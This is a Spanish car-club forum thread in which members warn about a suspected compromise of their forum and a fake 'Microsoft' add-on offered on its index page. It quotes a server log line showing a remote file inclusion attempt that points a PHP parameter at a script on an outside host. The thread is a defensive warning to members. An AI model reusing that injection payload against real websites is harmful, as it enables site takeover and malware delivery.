Posible badware en el foro.... (SOLUCIONADO)
Moderadores: PegasoD4D, julapatos, Ayocab, Achilles, jony83, manu_mad, Hator
- lespaulstd
- Mensajes: 4989
- Registrado: 23 Ene 2007 19:20
- Coche: Corolla 1.4 vvt-i 97cv - MR2 SW20 2.0 GTS 245cv
- Ubicación: TF-1 TF-5
- Contactar:
Atencion!!!!
me han mandado esto desde nuestro servidor de servicios;
ahora me lo notifican..
me han mandado esto desde nuestro servidor de servicios;
Se ha detectado el siguiente ataque:
85.214.56.123 - - [17/Mar/2008:09:14:45 +0100] "GET
/foro2/index.php?pg=http://www.cherepitsa.ru/administrator/components/co
m_
remository/images/check.txt? HTTP/1.1" 200 56019 clubtoyota.es "-"
"Mozilla/4.61 [en] (OS/2; U)" "-"
ahora me lo notifican..
Al entrar en el indice del foro me intenta descargar un complemento de "Microsoft".
Viendo que hay un hacker tras esta pagina divirtiendose a nuestra costa no lo he instalado y informo que no lo hagais los demás, ya que posiblemente sea peligroso. Un foro php no necesita ningún complemento de Internet explorer para funcionar normalmente.
Saludos
Viendo que hay un hacker tras esta pagina divirtiendose a nuestra costa no lo he instalado y informo que no lo hagais los demás, ya que posiblemente sea peligroso. Un foro php no necesita ningún complemento de Internet explorer para funcionar normalmente.
Saludos
Hola, yo usando Firefox sin problemas. Con IE no he probado (ni pienso). He visto que intenta conectar con una IP que no se si sera la del foro. Juan, si la quieres para comprobar y descartar, te la paso por MP para no comprometer aun mas la seguridad. Igualmente si necesitas ayuda y puedo ser de utilidad, cuenta conmigo, aunque me imagino que ya tendras gente echando una mano.
- lespaulstd
- Mensajes: 4989
- Registrado: 23 Ene 2007 19:20
- Coche: Corolla 1.4 vvt-i 97cv - MR2 SW20 2.0 GTS 245cv
- Ubicación: TF-1 TF-5
- Contactar:
no es vbulletin es en smf...aqui un avance de lo que queremos que sea...
www.clubtoyota.es/smf
www.clubtoyota.es/smf













